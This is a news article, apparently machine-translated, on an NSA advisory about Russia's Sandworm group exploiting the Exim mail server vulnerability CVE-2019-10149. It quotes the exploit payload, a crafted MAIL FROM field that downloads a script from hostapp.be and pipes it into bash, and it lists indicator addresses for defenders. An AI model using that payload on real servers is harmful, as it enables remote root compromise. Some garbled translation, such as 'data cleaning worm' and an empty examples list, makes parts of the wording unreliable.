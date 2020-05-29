%MINIFYHTML0ce39f24e0fa618f4e3de9ca9b99b51313%

A group of Russian hackers linked to attacks on the power grid in Ukraine, the world's most destructive data cleaning worm, and other nefarious Kremlin operations are exploiting a vulnerability that allows it to take control of government-operated computers. from the USA USA And its partners.

In a notice released Thursday, the US National Security Agency. USA He said the Sandworm group was actively exploiting a vulnerability in Exim, an open source mail transfer agent, or MTA, for Unix-based operating systems. Tracked as CVE-2019-10149, the critical error makes it possible for an unauthenticated remote attacker to send specially crafted emails that execute commands with root privileges. With that, the attacker can install programs of their choice, modify data and create new accounts.

A CVE-2019-10149 patch has been available since last June. The attacks have been active since at least August. NSA officials wrote:

Actors exploited victims using Exim software on their public MTAs by sending a command in the "MAIL FROM,quot; field of an SMTP (Simple Mail Transfer Protocol) message. Below is a sample, containing parameters that the actor would modify by implementation. MAIL FROM:<${run{x2Fbinx2Fshtctx22execx20x2Fusrx2Fbinx2Fwgetx20x2DOx20x2Dx20http:x2Fx2Fhostapp.bex2Fscript1.shx20x7C x20bashx22}}@hostapp.be> Hexadecimal decoded command: / bin / sh -c "exec / usr / bin / wget -O - http://hostapp.be/script1.sh | bash,quot; Figure 1: Example of exploitation command "MAIL FROM,quot; When CVE-2019-10149 is successfully exploited, an actor can execute the code of their choice. When Sandworm exploited CVE-2019-10149, the victim machine would later download and run a shell script from a Sandworm-controlled domain. This script would try to do the following on the victim machine: add privileged users, disable network security settings, update SSH settings to allow additional remote access, run additional script to allow trace exploitation.

Thursday's notice said hackers were working for a specific unit, known as the Main Center for Special Technologies, which is within the GRU, or Russia's Main Intelligence Directorate. There is general agreement among security researchers that the hacking group working on behalf of this unit has been responsible for some of the most ambitious and destructive cyber attacks in recent years.

Examples include:

Cable journalist Andy Greenberg recently published Sand worm, a book that narrates the hacks and the geopolitical tensions that explode.

The Exim mail server bug came to light last June, at the same time that the developers released a security patch. The notice says that remote attacks generally require vulnerable systems to no longer run with default settings. However, in one case, remote attacks were possible against default systems when an attacker kept a connection to the vulnerable server open for seven days by transmitting one byte every few minutes.

Thursday's notice did not say how many servers have been successfully targeted or the geographies or industries they are in. Still, the NSA generally does not issue these types of warnings unless there are concerns.

The people responsible for the Exim servers should verify that they are running version 4.92 or higher. And as a precaution, administrators should also check the system logs for connections to 95.216.13.196, 103.94.157.5, and hostapp.be, all connected to the ongoing Sandworm campaign.